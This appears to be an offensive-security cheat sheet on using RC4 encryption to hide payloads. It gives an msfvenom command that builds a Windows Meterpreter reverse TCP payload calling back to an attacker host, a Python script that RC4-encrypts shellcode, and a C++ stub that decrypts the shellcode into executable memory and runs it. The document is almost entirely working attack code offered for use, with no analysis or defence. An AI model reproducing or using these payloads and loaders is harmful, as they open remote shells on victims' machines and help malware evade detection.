RC4 Encryption

msfvenom RC4 encrypted transport

msfvenom -p windows/meterpreter/reverse_tcp_rc4 \
  LHOST=<ip> LPORT=4444 RC4PASSWORD=MyKey123 -f exe > rc4.exe

Python — RC4 encrypt shellcode

def rc4_init(key: bytes) -> list:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    return s

def rc4_crypt(s: list, data: bytes) -> bytes:
    i = j = 0
    out = []
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)

key = b"MyKey123"
with open("sc.bin", "rb") as f: sc = f.read()
encrypted = rc4_crypt(rc4_init(key), sc)
with open("sc_rc4.bin", "wb") as f: f.write(encrypted)

C++ — RC4 decrypt + execute stub

#include <Windows.h>
unsigned char s[256];

void rc4_init(const unsigned char* key, int klen) {
    int j = 0;
    for (int i = 0; i < 256; i++) s[i] = i;
    for (int i = 0; i < 256; i++) {
        j = (j + s[i] + key[i % klen]) % 256;
        unsigned char t = s[i]; s[i] = s[j]; s[j] = t;
    }
}

void rc4_crypt(unsigned char* data, int dlen) {
    int i = 0, j = 0;
    for (int k = 0; k < dlen; k++) {
        i = (i+1)%256; j = (j+s[i])%256;
        unsigned char t = s[i]; s[i] = s[j]; s[j] = t;
        data[k] ^= s[(s[i]+s[j])%256];
    }
}

int main() {
    const unsigned char key[] = "MyKey123";
    rc4_init(key, sizeof(key)-1);

    unsigned char shellcode[] = { /* RC4 encrypted shellcode */ };
    rc4_crypt(shellcode, sizeof(shellcode));

    void* mem = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(mem, shellcode, sizeof(shellcode));
    ((void(*)())mem)();
    return 0;
}